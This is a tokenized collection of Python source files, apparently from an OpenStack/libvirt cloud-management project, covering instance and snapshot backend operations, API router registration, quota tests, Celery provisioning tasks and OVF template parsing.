service_project_link . floating_ips . get ( <EOL> status__in = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> address = instance . external_ips , <EOL> backend_network_id = service_project_link . external_network_id <EOL> ) <EOL> server . add_floating_ip ( address = instance . external_ips , fixed_address = instance . internal_ips ) <EOL> except ( <EOL> nova_exceptions . ClientException , <EOL> ObjectDoesNotExist , <EOL> MultipleObjectsReturned , <EOL> KeyError , <EOL> IndexError , <EOL> ) : <EOL> logger . exception ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> instance . set_erred ( ) <EOL> instance . error_message = '<STR_LIT>' % ( instance . external_ips , <EOL> instance . uuid ) <EOL> instance . save ( ) <EOL> else : <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> def connect_tenant_to_external_network ( self , tenant , external_network_id ) : <EOL> neutron = self . neutron_admin_client <EOL> logger . debug ( '<STR_LIT>' , tenant . name , tenant . pk ) <EOL> try : <EOL> response = neutron . show_network ( external_network_id ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , external_network_id ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> network_name = response [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> subnet_id = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( network_name , subnet_id , <EOL> external = True , network_id = response [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> tenant . external_network_id = external_network_id <EOL> tenant . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> external_network_id , tenant . backend_id ) <EOL> return external_network_id <EOL> def get_or_create_router ( self , network_name , subnet_id , external = False , network_id = None ) : <EOL> neutron = self . neutron_admin_client <EOL> tenant_id = self . tenant_id <EOL> router_name = '<STR_LIT>' . format ( network_name ) <EOL> routers = neutron . list_routers ( tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if routers : <EOL> logger . info ( '<STR_LIT>' , tenant_id ) <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> router = neutron . create_router ( { '<STR_LIT>' : { '<STR_LIT:name>' : router_name , '<STR_LIT>' : tenant_id } } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , router [ '<STR_LIT:name>' ] ) <EOL> try : <EOL> if not external : <EOL> ports = neutron . list_ports ( device_id = router [ '<STR_LIT:id>' ] , tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if not ports : <EOL> neutron . add_interface_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : subnet_id } ) <EOL> logger . info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> if ( not router . get ( '<STR_LIT>' ) or <EOL> router [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) != network_id ) : <EOL> neutron . add_gateway_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : network_id } ) <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . warning ( e ) <EOL> return router [ '<STR_LIT:id>' ] <EOL> def start_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . ONLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> return <EOL> nova . servers . start ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> def stop_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . OFFLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> return <EOL> nova . servers . stop ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> instance . start_time = None <EOL> instance . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> def restart_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> nova . servers . reboot ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' , retries = <NUM_LIT> ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> def delete_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> nova . servers . delete ( instance . backend_id ) <EOL> if not self . _wait_for_instance_deletion ( instance . backend_id ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . resource . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . resource . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . resource . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> if instance . service_project_link . floating_ips . filter ( address = instance . external_ips ) . update ( status = '<STR_LIT>' ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> def create_snapshots ( self , service_project_link , volume_ids , prefix = '<STR_LIT>' ) : <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> try : <EOL> snapshot_ids = [ ] <EOL> for volume_id in volume_ids : <EOL> snapshot = self . create_snapshot ( volume_id , cinder ) <EOL> service_project_link . add_quota_usage ( '<STR_LIT>' , self . gb2mb ( snapshot . size ) ) <EOL> snapshot_ids . append ( snapshot . id ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> return snapshot_ids <EOL> def delete_snapshots ( self , service_project_link , snapshot_ids ) : <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> try : <EOL> for snapshot_id in snapshot_ids : <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> size = cinder . volume_snapshots . get ( snapshot_id ) . size <EOL> if not self . _wait_for_snapshot_status ( snapshot_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' , poll_interval = <NUM_LIT> , retries = <NUM_LIT:30> ) : <EOL> raise OpenStackBackendError ( '<STR_LIT>' , snapshot_id ) <EOL> cinder . volume_snapshots . delete ( snapshot_id ) <EOL> if self . _wait_for_snapshot_deletion ( snapshot_id , cinder ) : <EOL> service_project_link . add_quota_usage ( '<STR_LIT>' , - self . gb2mb ( size ) ) <EOL> logger . info ( '<STR_LIT>' , snapshot_id ) <EOL> else : <EOL> logger . exception ( '<STR_LIT>' , snapshot_id ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> def create_volume_from_snapshot ( self , snapshot_id , prefix = '<STR_LIT>' ) : <EOL> cinder = self . cinder_client <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> volume_size = snapshot . size <EOL> volume_name = prefix + ( '<STR_LIT>' % snapshot . volume_id ) <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> created_volume = cinder . volumes . create ( volume_size , snapshot_id = snapshot_id , <EOL> display_name = volume_name ) <EOL> volume_id = created_volume . id <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> raise OpenStackBackendError ( '<STR_LIT>' , snapshot_id ) <EOL> logger . info ( '<STR_LIT>' , <EOL> volume_id , snapshot_id ) <EOL> return volume_id <EOL> def promote_snapshots_to_volumes ( self , service_project_link , snapshot_ids , prefix = '<STR_LIT>' ) : <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> try : <EOL> promoted_volume_ids = [ ] <EOL> for snapshot_id in snapshot_ids : <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> promoted_volume_id = self . create_volume_from_snapshot ( snapshot_id , prefix = prefix ) <EOL> promoted_volume_ids . append ( promoted_volume_id ) <EOL> service_project_link . add_quota_usage ( '<STR_LIT>' , self . gb2mb ( snapshot . size ) ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( promoted_volume_ids ) ) <EOL> return promoted_volume_ids <EOL> @ log_backend_action ( ) <EOL> def update_tenant ( self , tenant ) : <EOL> keystone = self . keystone_admin_client <EOL> try : <EOL> keystone . tenants . update ( tenant . backend_id , name = tenant . name , description = tenant . description ) <EOL> except keystone_exceptions . NotFound as e : <EOL> logger . error ( '<STR_LIT>' , tenant . backend_id ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def create_snapshot ( self , volume_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> snapshot = cinder . volume_snapshots . create ( <EOL> volume_id , force = True , display_name = '<STR_LIT>' % volume_id ) <EOL> logger . debug ( '<STR_LIT>' % snapshot . id ) <EOL> if not self . _wait_for_snapshot_status ( snapshot . id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( '<STR_LIT>' , volume_id ) <EOL> raise OpenStackBackendError ( ) <EOL> logger . info ( '<STR_LIT>' , snapshot . id , volume_id ) <EOL> return snapshot </s>
<s> from nodeconductor . openstack import views <EOL> def register_in ( router ) : <EOL> router . register ( r'<STR_LIT>' , views . OpenStackServiceViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . ImageViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . FlavorViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . InstanceViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . TenantViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . OpenStackServiceProjectLinkViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . SecurityGroupViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . FloatingIPViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . BackupScheduleViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . BackupViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . LicenseViewSet , base_name = '<STR_LIT>' ) </s>
<s> from django . test import TestCase <EOL> from nodeconductor . quotas import models <EOL> from nodeconductor . structure import models as structure_models <EOL> from nodeconductor . structure . tests import factories as structure_factories <EOL> class GlobalQuotasHandlersTestCase ( TestCase ) : <EOL> def test_project_global_quota_increased_after_project_creation ( self ) : <EOL> quota = models . Quota . objects . get ( name = structure_models . Project . GLOBAL_COUNT_QUOTA_NAME ) <EOL> structure_factories . ProjectFactory ( ) <EOL> reread_quota = models . Quota . objects . get ( pk = quota . pk ) <EOL> self . assertEqual ( reread_quota . usage , quota . usage + <NUM_LIT:1> ) <EOL> def test_project_global_quota_decreased_after_project_deletion ( self ) : <EOL> project = structure_factories . ProjectFactory ( ) <EOL> quota = models . Quota . objects . get ( name = structure_models . Project . GLOBAL_COUNT_QUOTA_NAME ) <EOL> project . delete ( ) <EOL> reread_quota = models . Quota . objects . get ( pk = quota . pk ) <EOL> self . assertEqual ( reread_quota . usage , quota . usage - <NUM_LIT:1> ) </s>
<s> from __future__ import unicode_literals <EOL> from uuid import uuid4 <EOL> from django . db import migrations <EOL> def create_quotas ( apps , schema_editor ) : <EOL> Project = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Customer = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ProjectGroup = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Quota = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> quota_name_map = { <EOL> Project : '<STR_LIT>' , <EOL> Customer : '<STR_LIT>' , <EOL> ProjectGroup : '<STR_LIT>' , <EOL> } <EOL> for model in [ Project , Customer , ProjectGroup ] : <EOL> name = quota_name_map [ model ] <EOL> usage = model . objects . count ( ) <EOL> if not Quota . objects . filter ( name = name , object_id__isnull = True ) . exists ( ) : <EOL> Quota . objects . create ( uuid = uuid4 ( ) . hex , name = name , usage = usage ) <EOL> else : <EOL> Quota . objects . filter ( name = name , object_id__isnull = True ) . update ( usage = usage ) <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RunPython ( create_quotas ) , <EOL> ] </s>
<s> import factory <EOL> from rest_framework import test , status <EOL> from nodeconductor . openstack . tests . factories import InstanceFactory <EOL> from nodeconductor . structure import SupportedServices <EOL> from nodeconductor . structure . models import CustomerRole , Resource <EOL> from nodeconductor . structure . tests import factories <EOL> class ResourceQuotasTest ( test . APITransactionTestCase ) : <EOL> def setUp ( self ) : <EOL> self . user = factories . UserFactory ( ) <EOL> self . customer = factories . CustomerFactory ( ) <EOL> self . customer . add_user ( self . user , CustomerRole . OWNER ) <EOL> self . project = factories . ProjectFactory ( customer = self . customer ) <EOL> def test_auto_quotas_update ( self ) : <EOL> service_type = '<STR_LIT>' <EOL> models = SupportedServices . get_service_models ( ) [ service_type ] <EOL> settings = factories . ServiceSettingsFactory ( customer = self . customer , type = service_type , shared = False ) <EOL> class ServiceFactory ( factory . DjangoModelFactory ) : <EOL> class Meta ( object ) : <EOL> model = models [ '<STR_LIT>' ] <EOL> class ServiceProjectLinkFactory ( factory . DjangoModelFactory ) : <EOL> class Meta ( object ) : <EOL> model = models [ '<STR_LIT>' ] <EOL> service = ServiceFactory ( customer = self . customer , settings = settings ) <EOL> for resource_model in models [ '<STR_LIT>' ] : <EOL> if not hasattr ( resource_model , '<STR_LIT>' ) : <EOL> continue <EOL> class ResourceFactory ( factory . DjangoModelFactory ) : <EOL> class Meta ( object ) : <EOL> model = resource_model <EOL> data = { '<STR_LIT>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> service_project_link = ServiceProjectLinkFactory ( service = service , project = self . project ) <EOL> resource = ResourceFactory ( service_project_link = service_project_link , cores = data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:1> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> resource . ram = data [ '<STR_LIT>' ] <EOL> resource . disk = data [ '<STR_LIT>' ] <EOL> resource . save ( ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , data [ '<STR_LIT>' ] ) <EOL> resource . delete ( ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> class ResourceRemovalTest ( test . APITransactionTestCase ) : <EOL> def setUp ( self ) : <EOL> self . user = factories . UserFactory ( is_staff = True ) <EOL> self . client . force_authenticate ( user = self . user ) <EOL> def test_vm_unlinked_immediately_anyway ( self ) : <EOL> vm = InstanceFactory ( state = Resource . States . PROVISIONING_SCHEDULED ) <EOL> url = InstanceFactory . get_url ( vm , '<STR_LIT>' ) <EOL> response = self . client . post ( url ) <EOL> self . assertEqual ( response . status_code , status . HTTP_204_NO_CONTENT , response . data ) <EOL> def test_vm_without_backend_id_removed_immediately ( self ) : <EOL> vm = InstanceFactory ( state = Resource . States . OFFLINE ) <EOL> url = InstanceFactory . get_url ( vm ) <EOL> response = self . client . delete ( url ) <EOL> self . assertEqual ( response . status_code , status . HTTP_204_NO_CONTENT , response . data ) <EOL> def test_vm_with_backend_id_scheduled_to_deletion ( self ) : <EOL> vm = InstanceFactory ( state = Resource . States . OFFLINE , backend_id = <NUM_LIT> ) <EOL> url = InstanceFactory . get_url ( vm ) <EOL> response = self . client . delete ( url ) <EOL> self . assertEqual ( response . status_code , status . HTTP_202_ACCEPTED , response . data ) </s>
<s> from celery import shared_task <EOL> from nodeconductor . core . tasks import retry_if_false <EOL> from nodeconductor . structure import SupportedServices <EOL> from nodeconductor . template import models <EOL> @ shared_task <EOL> def schedule_provision ( previous_task_data = None , url = None , template_uuid = None , token_key = None , <EOL> additional_options = None , template_group_result_uuid = None ) : <EOL> template = models . Template . objects . get ( uuid = template_uuid ) <EOL> response_data = template . schedule_provision ( url , token_key , additional_options , previous_task_data ) . json ( ) <EOL> if template_group_result_uuid is not None : <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> resource_type = SupportedServices . get_name_for_model ( template . object_content_type . model_class ( ) ) <EOL> template_group_result . state_message = '<STR_LIT>' % resource_type <EOL> template_group_result . save ( ) <EOL> return response_data <EOL> @ shared_task ( max_retries = <NUM_LIT> , default_retry_delay = <NUM_LIT:20> ) <EOL> @ retry_if_false <EOL> def wait_for_provision ( previous_task_data = None , template_uuid = None , token_key = None , <EOL> template_group_result_uuid = None , success_states = [ '<STR_LIT>' , '<STR_LIT:OK>' ] , erred_state = '<STR_LIT>' ) : <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> template = models . Template . objects . get ( uuid = template_uuid ) <EOL> url = previous_task_data [ '<STR_LIT:url>' ] <EOL> resource_data = template . get_resource ( url , token_key ) . json ( ) <EOL> resource_type = SupportedServices . get_name_for_model ( template . object_content_type . model_class ( ) ) <EOL> template_group_result . provisioned_resources [ resource_type ] = url <EOL> template_group_result . save ( ) <EOL> state = resource_data [ '<STR_LIT:state>' ] <EOL> if state in success_states : <EOL> template_group_result . state_message = '<STR_LIT>' % resource_type <EOL> template_group_result . save ( ) <EOL> return resource_data <EOL> elif state != erred_state : <EOL> template_group_result . state_message = '<STR_LIT>' % ( resource_type , state ) <EOL> template_group_result . save ( ) <EOL> return False <EOL> else : <EOL> message = '<STR_LIT>' % resource_type <EOL> details = '<STR_LIT>' % ( url , state ) <EOL> raise models . TemplateActionException ( message , details ) <EOL> @ shared_task <EOL> def template_group_execution_succeed ( template_group_result_uuid ) : <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> template_group_result . state_message = '<STR_LIT>' <EOL> template_group_result . is_finished = True <EOL> template_group_result . save ( ) <EOL> @ shared_task ( bind = True ) <EOL> def template_group_execution_failed ( self , task_uuid , template_group_result_uuid ) : <EOL> task_result = self . app . AsyncResult ( task_uuid ) <EOL> error = models . TemplateActionException . deserialize ( str ( task_result . result ) ) <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> template_group_result . state_message = '<STR_LIT>' <EOL> template_group_result . error_message = error [ '<STR_LIT:message>' ] <EOL> template_group_result . error_details = error . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> template_group_result . is_finished = True <EOL> template_group_result . is_erred = True <EOL> template_group_result . save ( ) </s>
<s> from contextlib import closing <EOL> from os import path <EOL> from xml . etree import ElementTree as ET <EOL> import libvirt <EOL> import operator <EOL> import os <EOL> import shutil <EOL> import tarfile <EOL> import xml . dom <EOL> from ovf . OvfFile import OvfFile <EOL> from ovf . OvfReferencedFile import OvfReferencedFile <EOL> from opennode . cli . config import get_config <EOL> from opennode . cli . log import get_logger <EOL> from opennode . cli . actions . utils import execute , get_file_size_bytes , calculate_hash , TemplateException <EOL> from opennode . cli . actions . vm import ovfutil <EOL> from opennode . cli . actions import sysresources as sysres <EOL> from opennode . cli . actions . utils import roll_data <EOL> def get_ovf_template_settings ( ovf_file ) : <EOL> """<STR_LIT>""" <EOL> settings = read_default_ovf_settings ( ) <EOL> read_ovf_settings ( settings , ovf_file ) <EOL> return settings <EOL> def get_active_template_settings ( vm_name , storage_pool ) : <EOL> """<STR_LIT>""" <EOL> settings = read_default_ovf_settings ( ) <EOL> kvm_xml_dom = get_libvirt_conf_xml ( vm_name ) <EOL> domain_dom = kvm_xml_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> interface_list_dom = domain_dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> os_dom = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> os_type_dom = os_dom . getElementsByTagName ( "<STR_LIT:type>" ) [ <NUM_LIT:0> ] <EOL> os_arch = os_type_dom . getAttribute ( "<STR_LIT>" ) <EOL> settings [ "<STR_LIT>" ] = os_arch <EOL> vcpu_count = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . firstChild . nodeValue <EOL> settings [ "<STR_LIT>" ] = vcpu_count <EOL> settings [ "<STR_LIT>" ] = vcpu_count <EOL> settings [ "<STR_LIT>" ] = vcpu_count <EOL> memory_count = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . firstChild . nodeValue <EOL> settings [ "<STR_LIT>" ] = str ( round ( float ( memory_count ) / <NUM_LIT> ** <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> settings [ "<STR_LIT>" ] = str ( round ( float ( memory_count ) / <NUM_LIT> ** <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> settings [ "<STR_LIT>" ] = str ( round ( float ( memory_count ) / <NUM_LIT> ** <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> features_dom_list = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . childNodes <EOL> for feature in features_dom_list : <EOL> if ( feature . nodeType == feature . ELEMENT_NODE ) : <EOL> settings [ "<STR_LIT>" ] . append ( str ( feature . nodeName ) ) <EOL> for interface_dom in interface_list_dom : <EOL> if interface_dom . getAttribute ( "<STR_LIT:type>" ) == "<STR_LIT>" : <EOL> mac_address = interface_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . getAttribute ( "<STR_LIT:address>" ) <EOL> bridge_name = interface_dom . getElementsByTagName ( "<STR_LIT:source>" ) [ <NUM_LIT:0> ] . getAttribute ( "<STR_LIT>" ) <EOL> settings [ "<STR_LIT>" ] . append ( { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : bridge_name , <EOL> "<STR_LIT>" : mac_address } ) <EOL> return settings <EOL> def get_libvirt_conf_xml ( vm_name ) : <EOL> conn = libvirt . open ( "<STR_LIT>" ) <EOL> vm = conn . lookupByName ( vm_name ) <EOL> document = xml . dom . minidom . parseString ( vm . XMLDesc ( <NUM_LIT:0> ) ) <EOL> return document <EOL> def read_default_ovf_settings ( ) : <EOL> """<STR_LIT>""" <EOL> config = get_config ( "<STR_LIT>" ) <EOL> settings = { <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:port>" : - <NUM_LIT:1> , <EOL> "<STR_LIT>" : "<STR_LIT:yes>" , <EOL> "<STR_LIT>" : config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) } , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> settings . update ( dict ( config . getlist ( '<STR_LIT>' ) ) ) <EOL> if not os . path . exists ( settings . get ( "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> settings [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> return settings <EOL> def read_ovf_settings ( settings , ovf_file ) : <EOL> """<STR_LIT>""" <EOL> settings [ "<STR_LIT>" ] = path . splitext ( path . basename ( ovf_file . path ) ) [ <NUM_LIT:0> ] <EOL> sys_type , sys_arch = ovfutil . get_vm_type ( ovf_file ) . split ( "<STR_LIT:->" ) <EOL> if sys_type != "<STR_LIT>" : <EOL> raise TemplateException ( "<STR_LIT>" % sys_type ) <EOL> if sys_arch not in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> raise TemplateException ( "<STR_LIT>" % sys_arch ) <EOL> settings [ "<STR_LIT>" ] = sys_arch <EOL> memory_settings = [ <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_min_memory_gb ( ovf_file ) ) , <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_normal_memory_gb ( ovf_file ) ) , <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_max_memory_gb ( ovf_file ) ) ] <EOL> settings . update ( dict ( filter ( operator . itemgetter ( <NUM_LIT:1> ) , memory_settings ) ) ) <EOL> vcpu_settings = [ <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_min_vcpu ( ovf_file ) ) , <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_normal_vcpu ( ovf_file ) ) , <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_max_vcpu ( ovf_file ) ) ] <EOL> settings . update ( dict ( filter ( operator . itemgetter ( <NUM_LIT:1> ) , vcpu_settings ) ) ) <EOL> network_list = ovfutil . get_networks ( ovf_file ) <EOL> for network in network_list : <EOL> settings [ "<STR_LIT>" ] . append ( { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : network [ "<STR_LIT>" ] } ) <EOL> settings [ "<STR_LIT>" ] = ovfutil . get_disks ( ovf_file ) <EOL> settings [ "<STR_LIT>" ] = ovfutil . get_openode_features ( ovf_file ) <EOL> settings [ '<STR_LIT>' ] = ovfutil . get_root_password ( ovf_file ) <EOL> settings [ '<STR_LIT:username>' ] = ovfutil . get_admin_username ( ovf_file ) <EOL> return settings <EOL> def deploy ( settings , storage_pool ) : <EOL> log = get_logger ( ) <EOL> log . info ( "<STR_LIT>" ) <EOL> prepare_file_system ( settings , storage_pool ) <EOL> log . info ( "<STR_LIT>" ) 